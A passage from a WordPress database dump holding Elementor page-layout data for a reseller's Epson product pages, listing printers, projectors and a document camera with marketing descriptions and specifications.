src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><br>\\n\\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.\\n<ul>\\n \\t<li>White and Colour Brightness at 8,000lm<\\/li>\\n \\t<li>WUXGA (1920 x 1200)<\\/li>\\n \\t<li>Edge-blending to create large panoramic images<\\/li>\\n \\t<li>Curve and corner wall projection<\\/li>\\n \\t<li>HDBaseT<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><br>\\n\\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\\n<ul>\\n \\t<li>White and Colour Brightness at 10,000\\u00a0lm<\\/li>\\n \\t<li>WUXGA resolution<\\/li>\\n \\t<li>High Reliability and Durability<\\/li>\\n \\t<li>Suitable for 24\\/7 usage<\\/li>\\n \\t<li>Flexible projection angles and installations<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8103,3501,'_elementor_version','2.5.14'),(8652,3661,'_hide_footer',''),(8653,3661,'_hide_breadcrumb',''),(8113,3503,'_wp_page_template','template-fullwidth.php'),(8114,3503,'_elementor_edit_mode','builder'),(8115,3503,'_elementor_template_type','post'),(8116,3503,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson 